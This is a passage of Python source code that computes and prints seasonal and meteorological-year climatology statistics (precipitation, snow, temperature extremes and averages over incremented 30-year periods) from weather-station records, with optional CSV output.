metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): climo30yrs[c]["prcp"].append(sum(metclmt[y][season]["prcp"])) climo30yrs[c]["prcpPROP"]["days"] += metclmt[y][season]["prcpDAYS"] climo30yrs[c]["total_days"] += metclmt[y][season]["recordqty"] if metclmt[y][season]["recordqty"] > excludeseason: if metclmt[y][season]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["season_max_days"][0]: climo30yrs[c]["prcpPROP"]["season_max_days"][1].append(y) elif metclmt[y][season]["prcpDAYS"] > climo30yrs[c]["prcpPROP"]["season_max_days"][0]: climo30yrs[c]["prcpPROP"]["season_max_days"][0] = metclmt[y][season]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["season_max_days"][1] = [] climo30yrs[c]["prcpPROP"]["season_max_days"][1].append(y) if metclmt[y][season]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["season_min_days"][0]: climo30yrs[c]["prcpPROP"]["season_min_days"][1].append(y) elif metclmt[y][season]["prcpDAYS"] < climo30yrs[c]["prcpPROP"]["season_min_days"][0]: climo30yrs[c]["prcpPROP"]["season_min_days"][0] = metclmt[y][season]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["season_min_days"][1] = [] climo30yrs[c]["prcpPROP"]["season_min_days"][1].append(y) if sum(metclmt[y][season]["prcp"]) == climo30yrs[c]["prcpPROP"]["season_max"][0]: climo30yrs[c]["prcpPROP"]["season_max"][1].append(y) elif sum(metclmt[y][season]["prcp"]) > climo30yrs[c]["prcpPROP"]["season_max"][0]: climo30yrs[c]["prcpPROP"]["season_max"][0] = sum(metclmt[y][season]["prcp"]) climo30yrs[c]["prcpPROP"]["season_max"][1] = [] climo30yrs[c]["prcpPROP"]["season_max"][1].append(y) if sum(metclmt[y][season]["prcp"]) == climo30yrs[c]["prcpPROP"]["season_min"][0]: climo30yrs[c]["prcpPROP"]["season_min"][1].append(y) elif sum(metclmt[y][season]["prcp"]) < climo30yrs[c]["prcpPROP"]["season_min"][0]: climo30yrs[c]["prcpPROP"]["season_min"][0] = sum(metclmt[y][season]["prcp"]) climo30yrs[c]["prcpPROP"]["season_min"][1] = [] climo30yrs[c]["prcpPROP"]["season_min"][1].append(y) # SNOW 
alltime["snow"].append(sum(metclmt[y][season]["snow"])) alltime["snowPROP"]["days"] += metclmt[y][season]["snowDAYS"] if metclmt[y][season]["recordqty"] > excludeseason: if metclmt[y][season]["snowDAYS"] == alltime["snowPROP"]["season_max_days"][0]: alltime["snowPROP"]["season_max_days"][1].append(y) elif metclmt[y][season]["snowDAYS"] > alltime["snowPROP"]["season_max_days"][0]: alltime["snowPROP"]["season_max_days"][0] = metclmt[y][season]["snowDAYS"] alltime["snowPROP"]["season_max_days"][1] = [] alltime["snowPROP"]["season_max_days"][1].append(y) if sum(metclmt[y][season]["snow"]) == alltime["snowPROP"]["season_max"][0]: alltime["snowPROP"]["season_max"][1].append(y) elif sum(metclmt[y][season]["snow"]) > alltime["snowPROP"]["season_max"][0]: alltime["snowPROP"]["season_max"][0] = sum(metclmt[y][season]["snow"]) alltime["snowPROP"]["season_max"][1] = [] alltime["snowPROP"]["season_max"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): climo30yrs[c]["snow"].append(sum(metclmt[y][season]["snow"])) climo30yrs[c]["snowPROP"]["days"] += metclmt[y][season]["snowDAYS"] if metclmt[y][season]["recordqty"] > excludeseason: if metclmt[y][season]["snowDAYS"] == climo30yrs[c]["snowPROP"]["season_max_days"][0]: climo30yrs[c]["snowPROP"]["season_max_days"][1].append(y) elif metclmt[y][season]["snowDAYS"] > climo30yrs[c]["snowPROP"]["season_max_days"][0]: climo30yrs[c]["snowPROP"]["season_max_days"][0] = metclmt[y][season]["snowDAYS"] climo30yrs[c]["snowPROP"]["season_max_days"][1] = [] climo30yrs[c]["snowPROP"]["season_max_days"][1].append(y) if sum(metclmt[y][season]["snow"]) == climo30yrs[c]["snowPROP"]["season_max"][0]: climo30yrs[c]["snowPROP"]["season_max"][1].append(y) elif sum(metclmt[y][season]["snow"]) > climo30yrs[c]["snowPROP"]["season_max"][0]: climo30yrs[c]["snowPROP"]["season_max"][0] = sum(metclmt[y][season]["snow"]) 
climo30yrs[c]["snowPROP"]["season_max"][1] = [] climo30yrs[c]["snowPROP"]["season_max"][1].append(y) # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' # TAVG for x in metclmt[y][season]["tempAVGlist"]: alltime["tempAVGlist_ind"].append(x) if len(metclmt[y][season]["tempAVGlist"]) > excludeseason_tavg: alltime["tempAVGlist"].append(mean(metclmt[y][season]["tempAVGlist"])) if mean(metclmt[y][season]["tempAVGlist"]) == alltime["tavgPROP"]["season_max"][0]: alltime["tavgPROP"]["season_max"][1].append(y) elif mean(metclmt[y][season]["tempAVGlist"]) > alltime["tavgPROP"]["season_max"][0]: alltime["tavgPROP"]["season_max"][0] = mean(metclmt[y][season]["tempAVGlist"]) alltime["tavgPROP"]["season_max"][1] = [] alltime["tavgPROP"]["season_max"][1].append(y) if mean(metclmt[y][season]["tempAVGlist"]) == alltime["tavgPROP"]["season_min"][0]: alltime["tavgPROP"]["season_min"][1].append(y) elif mean(metclmt[y][season]["tempAVGlist"]) < alltime["tavgPROP"]["season_min"][0]: alltime["tavgPROP"]["season_min"][0] = mean(metclmt[y][season]["tempAVGlist"]) alltime["tavgPROP"]["season_min"][1] = [] alltime["tavgPROP"]["season_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): for x in metclmt[y][season]["tempAVGlist"]:climo30yrs[c]["tempAVGlist_ind"].append(x) if len(metclmt[y][season]["tempAVGlist"]) > excludeseason_tavg: climo30yrs[c]["tempAVGlist"].append(mean(metclmt[y][season]["tempAVGlist"])) if mean(metclmt[y][season]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["season_max"][0]: climo30yrs[c]["tavgPROP"]["season_max"][1].append(y) elif mean(metclmt[y][season]["tempAVGlist"]) > climo30yrs[c]["tavgPROP"]["season_max"][0]: climo30yrs[c]["tavgPROP"]["season_max"][0] = mean(metclmt[y][season]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["season_max"][1] = [] 
climo30yrs[c]["tavgPROP"]["season_max"][1].append(y) if mean(metclmt[y][season]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["season_min"][0]: climo30yrs[c]["tavgPROP"]["season_min"][1].append(y) elif mean(metclmt[y][season]["tempAVGlist"]) < climo30yrs[c]["tavgPROP"]["season_min"][0]: climo30yrs[c]["tavgPROP"]["season_min"][0] = mean(metclmt[y][season]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["season_min"][1] = [] climo30yrs[c]["tavgPROP"]["season_min"][1].append(y) # TMAX for x in metclmt[y][season]["tmax"]: alltime["tmax"].append(x) if len(metclmt[y][season]["tmax"]) > excludeseason: if mean(metclmt[y][season]["tmax"]) == alltime["tmaxPROP"]["season_max"][0]: alltime["tmaxPROP"]["season_max"][1].append(y) elif mean(metclmt[y][season]["tmax"]) > alltime["tmaxPROP"]["season_max"][0]: alltime["tmaxPROP"]["season_max"][0] = mean(metclmt[y][season]["tmax"]) alltime["tmaxPROP"]["season_max"][1] = [] alltime["tmaxPROP"]["season_max"][1].append(y) if mean(metclmt[y][season]["tmax"]) == alltime["tmaxPROP"]["season_min"][0]: alltime["tmaxPROP"]["season_min"][1].append(y) elif mean(metclmt[y][season]["tmax"]) < alltime["tmaxPROP"]["season_min"][0]: alltime["tmaxPROP"]["season_min"][0] = mean(metclmt[y][season]["tmax"]) alltime["tmaxPROP"]["season_min"][1] = [] alltime["tmaxPROP"]["season_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): for x in metclmt[y][season]["tmax"]: climo30yrs[c]["tmax"].append(x) if len(metclmt[y][season]["tmax"]) > excludeseason: if mean(metclmt[y][season]["tmax"]) == climo30yrs[c]["tmaxPROP"]["season_max"][0]: climo30yrs[c]["tmaxPROP"]["season_max"][1].append(y) elif mean(metclmt[y][season]["tmax"]) > climo30yrs[c]["tmaxPROP"]["season_max"][0]: climo30yrs[c]["tmaxPROP"]["season_max"][0] = mean(metclmt[y][season]["tmax"]) climo30yrs[c]["tmaxPROP"]["season_max"][1] = [] 
climo30yrs[c]["tmaxPROP"]["season_max"][1].append(y) if mean(metclmt[y][season]["tmax"]) == climo30yrs[c]["tmaxPROP"]["season_min"][0]: climo30yrs[c]["tmaxPROP"]["season_min"][1].append(y) elif mean(metclmt[y][season]["tmax"]) < climo30yrs[c]["tmaxPROP"]["season_min"][0]: climo30yrs[c]["tmaxPROP"]["season_min"][0] = mean(metclmt[y][season]["tmax"]) climo30yrs[c]["tmaxPROP"]["season_min"][1] = [] climo30yrs[c]["tmaxPROP"]["season_min"][1].append(y) # TMIN for x in metclmt[y][season]["tmin"]: alltime["tmin"].append(x) if len(metclmt[y][season]["tmin"]) > excludeseason: if mean(metclmt[y][season]["tmin"]) == alltime["tminPROP"]["season_max"][0]: alltime["tminPROP"]["season_max"][1].append(y) elif mean(metclmt[y][season]["tmin"]) > alltime["tminPROP"]["season_max"][0]: alltime["tminPROP"]["season_max"][0] = mean(metclmt[y][season]["tmin"]) alltime["tminPROP"]["season_max"][1] = [] alltime["tminPROP"]["season_max"][1].append(y) if mean(metclmt[y][season]["tmin"]) == alltime["tminPROP"]["season_min"][0]: alltime["tminPROP"]["season_min"][1].append(y) elif mean(metclmt[y][season]["tmin"]) < alltime["tminPROP"]["season_min"][0]: alltime["tminPROP"]["season_min"][0] = mean(metclmt[y][season]["tmin"]) alltime["tminPROP"]["season_min"][1] = [] alltime["tminPROP"]["season_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): for x in metclmt[y][season]["tmin"]: climo30yrs[c]["tmin"].append(x) if len(metclmt[y][season]["tmin"]) > excludeseason: if mean(metclmt[y][season]["tmin"]) == climo30yrs[c]["tminPROP"]["season_max"][0]: climo30yrs[c]["tminPROP"]["season_max"][1].append(y) elif mean(metclmt[y][season]["tmin"]) > climo30yrs[c]["tminPROP"]["season_max"][0]: climo30yrs[c]["tminPROP"]["season_max"][0] = mean(metclmt[y][season]["tmin"]) climo30yrs[c]["tminPROP"]["season_max"][1] = [] climo30yrs[c]["tminPROP"]["season_max"][1].append(y) if 
mean(metclmt[y][season]["tmin"]) == climo30yrs[c]["tminPROP"]["season_min"][0]: climo30yrs[c]["tminPROP"]["season_min"][1].append(y) elif mean(metclmt[y][season]["tmin"]) < climo30yrs[c]["tminPROP"]["season_min"][0]: climo30yrs[c]["tminPROP"]["season_min"][0] = mean(metclmt[y][season]["tmin"]) climo30yrs[c]["tminPROP"]["season_min"][1] = [] climo30yrs[c]["tminPROP"]["season_min"][1].append(y) # PRINT REPORT print("---------------------------------------------------") print("Climatology Report for Meteorological {}".format(season.capitalize())) print("City: {}, {}".format(metclmt["station"],metclmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("---------------------------------------------------") print("Part 1: Precipitation Stats") print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^11} |".format("Years","PRCP","PRCP","PRCP","PRCP","PRCP","PRCP","SNOW","SNOW","SNOW","SNOW")) print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^11} |".format("","DAYS","DAYS MAX","DAYS MIN","AVG", "MAX","MIN","DAYS","DAYS MAX","AVG", "MAX")) # Y PD PDx PDn PA PM Pmin SD SDx SA SM print("{:-^9} {:-^12} {:-^9} {:-^9} {:-^6} {:-^12} {:-^12} | {:-^11} {:-^9} {:-^6} {:-^11} |".format("","","","","","","","","","","")) print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>6.2f}, {:^4} {:>6.2f}, {:^4} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^4} |".format("All Time", alltime["prcpPROP"]["days"], round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1), alltime["prcpPROP"]["season_max_days"][0], alltime["prcpPROP"]["season_max_days"][1][0] if len(alltime["prcpPROP"]["season_max_days"][1]) == 1 else len(alltime["prcpPROP"]["season_max_days"][1]), alltime["prcpPROP"]["season_min_days"][0], alltime["prcpPROP"]["season_min_days"][1][0] if len(alltime["prcpPROP"]["season_min_days"][1]) == 1 else 
len(alltime["prcpPROP"]["season_min_days"][1]), round(mean(alltime["prcp"]),2) if len(alltime["prcp"]) > 0 else "--", round(alltime["prcpPROP"]["season_max"][0],2), alltime["prcpPROP"]["season_max"][1][0] if len(alltime["prcpPROP"]["season_max"][1]) == 1 else len(alltime["prcpPROP"]["season_max"][1]), round(alltime["prcpPROP"]["season_min"][0],2), alltime["prcpPROP"]["season_min"][1][0] if len(alltime["prcpPROP"]["season_min"][1]) == 1 else len(alltime["prcpPROP"]["season_min"][1]), alltime["snowPROP"]["days"] if alltime["snowPROP"]["days"] > 0 else "--", round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1) if alltime["snowPROP"]["days"] > 0 else "--", alltime["snowPROP"]["season_max_days"][0], alltime["snowPROP"]["season_max_days"][1][0] if len(alltime["snowPROP"]["season_max_days"][1]) == 1 else len(alltime["snowPROP"]["season_max_days"][1]), round(mean(alltime["snow"]),1) if len(alltime["snow"]) > 0 else "--", round(alltime["snowPROP"]["season_max"][0],2), alltime["snowPROP"]["season_max"][1][0] if len(alltime["snowPROP"]["season_max"][1]) == 1 else len(alltime["snowPROP"]["season_max"][1]))) for c in climo30yrs: #print(climo30yrs[c]["prcpPROP"]["days"],climo30yrs[c]["total_days"]) #print(climo30yrs[c]["snowPROP"]["days"],climo30yrs[c]["total_days"]) try: print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>6.2f}, {:^4} {:>6.2f}, {:^4} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^4} |".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), climo30yrs[c]["prcpPROP"]["days"], round(100 * climo30yrs[c]["prcpPROP"]["days"] / climo30yrs[c]["total_days"],1), climo30yrs[c]["prcpPROP"]["season_max_days"][0], climo30yrs[c]["prcpPROP"]["season_max_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["season_max_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["season_max_days"][1]), climo30yrs[c]["prcpPROP"]["season_min_days"][0], climo30yrs[c]["prcpPROP"]["season_min_days"][1][0] if 
len(climo30yrs[c]["prcpPROP"]["season_min_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["season_min_days"][1]), round(mean(climo30yrs[c]["prcp"]),2), round(climo30yrs[c]["prcpPROP"]["season_max"][0],2), climo30yrs[c]["prcpPROP"]["season_max"][1][0] if len(climo30yrs[c]["prcpPROP"]["season_max"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["season_max"][1]), round(climo30yrs[c]["prcpPROP"]["season_min"][0],2), climo30yrs[c]["prcpPROP"]["season_min"][1][0] if len(climo30yrs[c]["prcpPROP"]["season_min"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["season_min"][1]), climo30yrs[c]["snowPROP"]["days"] if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", round(100 * climo30yrs[c]["snowPROP"]["days"] / climo30yrs[c]["total_days"],1) if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", climo30yrs[c]["snowPROP"]["season_max_days"][0], climo30yrs[c]["snowPROP"]["season_max_days"][1][0] if len(climo30yrs[c]["snowPROP"]["season_max_days"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["season_max_days"][1]), round(mean(climo30yrs[c]["snow"]),1) if len(climo30yrs[c]["snow"]) > 0 else "--", round(climo30yrs[c]["snowPROP"]["season_max"][0],2), climo30yrs[c]["snowPROP"]["season_max"][1][0] if len(climo30yrs[c]["snowPROP"]["season_max"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["season_max"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("\nPart 2: Temperature Stats") print("{:▒^9} {:▒^37} | {:▒^37} | {:▒^37}".format("Years","AVG TEMP","TMAX","TMIN")) print("{:▒^9} {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12}".format("","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN")) # Y TSTDV TMA TMX TMn TSTDV TMA TMX TMn TSTDV TMA TMX TMn # "tempAVGlist": [],"tavgPROP":{"season_max":[-999,[]],"season_min":[999,[]]}, print("{:-^9} {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12}".format("","","","","","","","","","","","","")) 
print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format("All Time", round(pstdev(alltime["tempAVGlist"]),1), round(mean(alltime["tempAVGlist_ind"]),1), round(alltime["tavgPROP"]["season_max"][0],1), alltime["tavgPROP"]["season_max"][1][0] if len(alltime["tavgPROP"]["season_max"][1]) == 1 else len(alltime["tavgPROP"]["season_max"][1]), round(alltime["tavgPROP"]["season_min"][0],1), alltime["tavgPROP"]["season_min"][1][0] if len(alltime["tavgPROP"]["season_min"][1]) == 1 else len(alltime["tavgPROP"]["season_min"][1]), round(pstdev(alltime["tmax"]),1), round(mean(alltime["tmax"]),1), round(alltime["tmaxPROP"]["season_max"][0],1), alltime["tmaxPROP"]["season_max"][1][0] if len(alltime["tmaxPROP"]["season_max"][1]) == 1 else len(alltime["tmaxPROP"]["season_max"][1]), round(alltime["tmaxPROP"]["season_min"][0],1), alltime["tmaxPROP"]["season_min"][1][0] if len(alltime["tmaxPROP"]["season_min"][1]) == 1 else len(alltime["tmaxPROP"]["season_min"][1]), round(pstdev(alltime["tmin"]),1), round(mean(alltime["tmin"]),1), round(alltime["tminPROP"]["season_max"][0],1), alltime["tminPROP"]["season_max"][1][0] if len(alltime["tminPROP"]["season_max"][1]) == 1 else len(alltime["tminPROP"]["season_max"][1]), round(alltime["tminPROP"]["season_min"][0],1), alltime["tminPROP"]["season_min"][1][0] if len(alltime["tminPROP"]["season_min"][1]) == 1 else len(alltime["tminPROP"]["season_min"][1]))) for c in climo30yrs: try: print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), round(pstdev(climo30yrs[c]["tempAVGlist"]),1), round(mean(climo30yrs[c]["tempAVGlist_ind"]),1), round(climo30yrs[c]["tavgPROP"]["season_max"][0],1), climo30yrs[c]["tavgPROP"]["season_max"][1][0] if 
len(climo30yrs[c]["tavgPROP"]["season_max"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["season_max"][1]), round(climo30yrs[c]["tavgPROP"]["season_min"][0],1), climo30yrs[c]["tavgPROP"]["season_min"][1][0] if len(climo30yrs[c]["tavgPROP"]["season_min"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["season_min"][1]), round(pstdev(climo30yrs[c]["tmax"]),1), round(mean(climo30yrs[c]["tmax"]),1), round(climo30yrs[c]["tmaxPROP"]["season_max"][0],1), climo30yrs[c]["tmaxPROP"]["season_max"][1][0] if len(climo30yrs[c]["tmaxPROP"]["season_max"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["season_max"][1]), round(climo30yrs[c]["tmaxPROP"]["season_min"][0],1), climo30yrs[c]["tmaxPROP"]["season_min"][1][0] if len(climo30yrs[c]["tmaxPROP"]["season_min"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["season_min"][1]), round(pstdev(climo30yrs[c]["tmin"]),1), round(mean(climo30yrs[c]["tmin"]),1), round(climo30yrs[c]["tminPROP"]["season_max"][0],1), climo30yrs[c]["tminPROP"]["season_max"][1][0] if len(climo30yrs[c]["tminPROP"]["season_max"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["season_max"][1]), round(climo30yrs[c]["tminPROP"]["season_min"][0],1), climo30yrs[c]["tminPROP"]["season_min"][1][0] if len(climo30yrs[c]["tminPROP"]["season_min"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["season_min"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("") if output == True: newfn = "seasonReport_met" + season.lower().capitalize() + "_" + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period (Meteorological {})".format(season.lower().capitalize()),"PRCP Days","PRCP % of days","PRCP stdev","PRCP AVG","SNOW Days","SNOW % of days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") 
w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmin"]))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["prcpPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["snowPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") 
w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmin"]))); w.write("\n") print("*** csv output successful ***") def metYearReport(climatology=30,increment=5,output=False): """Detailed Climatological Report all Meteorological years on record. A meteorological year goes from March to February of the following year. * no required arguments * Keyword Args (optional): climatology = 30: The span of years that averages are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. This could be opened in a spreadsheet program for further analysis Examples: metYearReport() -> Returns a 30-yr, 5-yr incremented climatological report for all meteorological years on record metYearReport(climatology=10) -> Returns a 10-yr, 5-yr incremented climatological report for all Meteorological years. metYearReport(climatology=10,increment=4,output=True) -> Returns a 4-yr incremented, 10yr climatology report for all years and outputs a CSV. 
""" valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in metclmt.keys() if type(x) == int] valid_yrs.sort() climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"year_max_days":[-1,[]],"year_min_days":[999,[]],"year_max":[-1,[]],"year_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"year_max_days":[-1,[]],"year_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmax": [],"tmaxPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmin": [],"tminPROP":{"year_max":[-999,[]],"year_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"year_max_days":[-1,[]],"year_min_days":[999,[]],"year_max":[-1,[]],"year_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"year_max_days":[-1,[]],"year_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmax": [],"tmaxPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmin": [],"tminPROP":{"year_max":[-999,[]],"year_min":[999,[]]}} print("*** PLEASE WAIT. 
This will take a few moments ***") for y in valid_yrs: # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' alltime["total_days"] += metclmt[y]["recordqty"] # PRCP alltime["prcp"].append(sum(metclmt[y]["prcp"])) alltime["prcpPROP"]["days"] += metclmt[y]["prcpDAYS"] if metclmt[y]["prcpDAYS"] == alltime["prcpPROP"]["year_max_days"][0]: alltime["prcpPROP"]["year_max_days"][1].append(y) elif metclmt[y]["prcpDAYS"] > alltime["prcpPROP"]["year_max_days"][0]: alltime["prcpPROP"]["year_max_days"][0] = metclmt[y]["prcpDAYS"] alltime["prcpPROP"]["year_max_days"][1] = [] alltime["prcpPROP"]["year_max_days"][1].append(y) if sum(metclmt[y]["prcp"]) == alltime["prcpPROP"]["year_max"][0]: alltime["prcpPROP"]["year_max"][1].append(y) elif sum(metclmt[y]["prcp"]) > alltime["prcpPROP"]["year_max"][0]: alltime["prcpPROP"]["year_max"][0] = sum(metclmt[y]["prcp"]) alltime["prcpPROP"]["year_max"][1] = [] alltime["prcpPROP"]["year_max"][1].append(y) if metclmt[y]["recordqty"] > excludeyear: if metclmt[y]["prcpDAYS"] == alltime["prcpPROP"]["year_min_days"][0]: alltime["prcpPROP"]["year_min_days"][1].append(y) elif metclmt[y]["prcpDAYS"] < alltime["prcpPROP"]["year_min_days"][0]: alltime["prcpPROP"]["year_min_days"][0] = metclmt[y]["prcpDAYS"] alltime["prcpPROP"]["year_min_days"][1] = [] alltime["prcpPROP"]["year_min_days"][1].append(y) if sum(metclmt[y]["prcp"]) == alltime["prcpPROP"]["year_min"][0]: alltime["prcpPROP"]["year_min"][1].append(y) elif sum(metclmt[y]["prcp"]) < alltime["prcpPROP"]["year_min"][0]: alltime["prcpPROP"]["year_min"][0] = sum(metclmt[y]["prcp"]) alltime["prcpPROP"]["year_min"][1] = [] alltime["prcpPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): climo30yrs[c]["prcp"].append(sum(metclmt[y]["prcp"])) climo30yrs[c]["prcpPROP"]["days"] += 
